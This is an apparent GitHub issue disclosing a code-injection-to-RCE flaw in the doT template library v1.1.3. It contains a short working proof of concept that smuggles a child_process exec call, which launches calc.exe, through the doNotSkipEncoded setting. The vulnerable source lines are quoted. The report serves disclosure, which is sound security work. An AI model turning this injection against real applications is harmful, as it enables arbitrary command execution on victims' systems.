doT icon indicating copy to clipboard operation
doT copied to clipboard

Published 20 hours ago verified publisher icon olado

in this library, there is a 'Code Injection to RCE' vuln

Open shyeun opened this issue 1 year ago • 0 comments

i found doT library v1.1.3 this is a poc

const doT = require('dot');


doT.templateSettings = {
  evaluate: /\{\{([\s\S]+?(\}?)+)\}\}/g,
  interpolate: /\{\{=([\s\S]+?)\}\}/g,
  encode: /\{\{!([\s\S]+?)\}\}/g,
  use: /\{\{#([\s\S]+?)\}\}/g,
  define: /\{\{##\s*([\w\.$]+)\s*(\:|=)([\s\S]+?)#\}\}/g,
  conditional: /\{\{\?(\?)?\s*([\s\S]*?)\s*\}\}/g,
  iterate: /\{\{~\s*(?:\}\}|([\s\S]+?)\s*\:\s*([\w$]+)\s*(?:\:\s*([\w$]+))?\s*\}\})/g,
  varname: 'it',
  strip: true,
  append: true,
  selfcontained: false,
  doNotSkipEncoded: `123));process.mainModule.constructor._load('child_process').exec('calc.exe');((11`,
};
const template = doT.template(`
{{!it.exploit}} 
`)

const data = {
  exploit: 'exploit',
  };

const result = template(data);
console.log(result)

if code use encode options, then doNotSkipEncoded's value is input in this code(node_modules/dot/doT.js).

...
if (needhtmlencode) {
			if (!c.selfcontained && _globals && !_globals._encodeHTML) _globals._encodeHTML = doT.encodeHTMLSource(c.doNotSkipEncoded);
			str = "var encodeHTML = typeof _encodeHTML !== 'undefined' ? _encodeHTML : ("
				+ doT.encodeHTMLSource.toString() + "(" + (c.doNotSkipEncoded || '') + "));"
				+ str;
		}
...

if you have other opinion, i want talk about this vuln whit you. thank you

shyeun avatar Nov 29 '23 00:11 shyeun